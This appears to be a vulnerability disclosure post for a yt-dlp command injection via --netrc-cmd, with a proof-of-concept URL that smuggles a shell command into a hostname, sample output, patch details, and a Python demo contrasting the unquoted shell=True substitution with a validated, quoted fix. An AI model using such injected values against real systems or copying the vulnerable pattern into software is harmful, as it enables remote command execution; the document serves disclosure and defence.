
CVE-2026-26331: yt-dlp Arbitrary Command Injection via --netrc-cmd

📅 2026-02-21 📂 Vulnerability Discovery
Tags: CVE, Command Injection, yt-dlp, Python, RCE
TL;DR:
Arbitrary command injection in yt-dlp's --netrc-cmd option lets an attacker execute OS commands on the user's system via a maliciously crafted URL, which can be delivered covertly through an HTTP redirect.

Summary

This post describes an arbitrary command injection vulnerability discovered in yt-dlp, one of the most popular media downloaders. When the --netrc-cmd command-line option (or the netrc_cmd Python API parameter) is in use, a maliciously crafted URL lets an attacker execute arbitrary commands on the user's system.

CVE ID: CVE-2026-26331
Advisory: GHSA-g3gw-q23r-pgqm
CWE: CWE-78 — OS Command Injection
Fixed in: yt-dlp 2026.02.21

Vulnerability Details

yt-dlp's --netrc-cmd option runs a user-supplied shell command to retrieve site login credentials. The command string may contain an optional placeholder ({}), which is replaced with the netrc "machine" value, typically the site hostname. The replacement is a plain string substitution: the value is neither validated nor shell-quoted before the command runs.

Three extractors (GetCourseRuIE, TeachableIE, TeachableCourseIE) accept wildcard subdomains, so for them the netrc "machine" value is not a fixed string but is derived from the hostname of the URL being processed. Because --netrc-cmd is executed via subprocess.Popen with shell=True, any shell metacharacters in that hostname are interpreted by the host shell.

Attack Vector

An attacker can craft a URL containing shell metacharacters in the subdomain. Even though the malicious URL itself looks suspicious, the attack can be delivered covertly — yt-dlp's "generic" extractor follows HTTP redirects, so an attacker can create a website with an innocent URL that redirects to the malicious one.

Proof of Concept

> yt-dlp --netrc-cmd "echo {}" "https://;echo pwned>&2;#.getcourse.ru/video"

[GetCourseRu] Executing command: echo getcourseru
WARNING: [GetCourseRu] Failed to parse .netrc: bad toplevel token 'getcourseru'
[GetCourseRu] Extracting URL: https://;echo pwned>&2;#.getcourse.ru/video
[GetCourseRu] Executing command: echo ;echo pwned>&2;
pwned
[GetCourseRu] No authenticators for ;echo pwned>&2;

The pwned output confirms arbitrary command execution through the crafted hostname. Note that echo {} is only a benign stand-in for a real credential helper: the injected ;echo pwned>&2; runs regardless of what the --netrc-cmd template itself does, because the hostname is substituted into the command string unquoted.

Impact

  • Arbitrary command execution on any system that runs yt-dlp with --netrc-cmd and the {} placeholder against URLs an attacker can influence
  • Covert exploitation via HTTP redirects from legitimate-looking URLs
  • High impact for automated pipelines and scripts that use yt-dlp with netrc authentication on untrusted input

Patch

Fixed in yt-dlp 2026.02.21 by validating all netrc "machine" values and raising an error upon unexpected input.

Fix commit: 1fbbe29
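The following added example is not code from yt-dlp or from this writeup. It reproduces the mechanism described above in isolation (unquoted {} substitution followed by shell=True execution) and contrasts it with a validating path of the kind the patch introduced. The names machine_from_url, build_netrc_cmd, validate_netrc_machine and run_netrc_cmd are chosen here; machine_from_url is a simplified stand-in for a wildcard-subdomain extractor, not yt-dlp's own logic, and the hostname regex is a conservative check written for this example rather than the exact rule used upstream.

```python
import re
import shlex
import subprocess
from urllib.parse import urlparse

# Constructed inputs: the benign command template and the PoC URL from above.
NETRC_CMD_TEMPLATE = "echo {}"
POC_URL = "https://;echo pwned>&2;#.getcourse.ru/video"

# Hostname-like values only: letters, digits, dots and hyphens.
# Assumption: this is a conservative check for this example, not the
# exact validation rule used by the upstream fix.
_SAFE_MACHINE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?$")


def machine_from_url(url: str) -> str:
    """Simplified stand-in for a wildcard-subdomain extractor (hypothetical,
    not yt-dlp's code): derive the netrc "machine" value from the URL host.
    urlparse stops the host at '#', so the PoC URL yields ';echo pwned>&2;'."""
    host = urlparse(url).hostname
    if host is None:
        raise ValueError(f"no host in {url!r}")
    return host


def build_netrc_cmd(template: str, machine: str) -> str:
    """The vulnerable behaviour described above: the literal '{}' in the
    user-supplied template is replaced by plain string substitution,
    with no quoting and no validation."""
    return template.replace("{}", machine)


def validate_netrc_machine(machine: str) -> str:
    """Hardened path: reject anything that is not a plain hostname and
    raise, as the patch is described as doing for unexpected input."""
    if not _SAFE_MACHINE.fullmatch(machine):
        raise ValueError(f"unexpected netrc machine value: {machine!r}")
    return machine


def run_netrc_cmd(template: str, machine: str, *, hardened: bool):
    """Execute the netrc command the way the page describes (shell=True).
    With hardened=True the machine value is validated first and, as a
    second layer, shell-quoted before substitution. Returns (stdout, stderr)."""
    if hardened:
        machine = shlex.quote(validate_netrc_machine(machine))
    cmd = build_netrc_cmd(template, machine)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout, proc.stderr


if __name__ == "__main__":
    machine = machine_from_url(POC_URL)
    print("machine value:", repr(machine))
    print("substituted command:", build_netrc_cmd(NETRC_CMD_TEMPLATE, machine))
    _, err = run_netrc_cmd(NETRC_CMD_TEMPLATE, machine, hardened=False)
    print("vulnerable path stderr:", err.strip())
    try:
        run_netrc_cmd(NETRC_CMD_TEMPLATE, machine, hardened=True)
    except ValueError as exc:
        print("hardened path:", exc)
    out, _ = run_netrc_cmd(NETRC_CMD_TEMPLATE, "getcourse.ru", hardened=True)
    print("hardened path with a real hostname:", out.strip())
```

Running the script prints the machine value recovered from the PoC URL, the substituted command string (echo ;echo pwned>&2;), the pwned line that the vulnerable path produces on stderr, and the ValueError raised by the validating path, followed by a normal run for a legitimate hostname. Validation alone is what the page describes as the fix; the shlex.quote call is an additional layer that makes the substituted value inert even if the allow-list is ever relaxed.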

References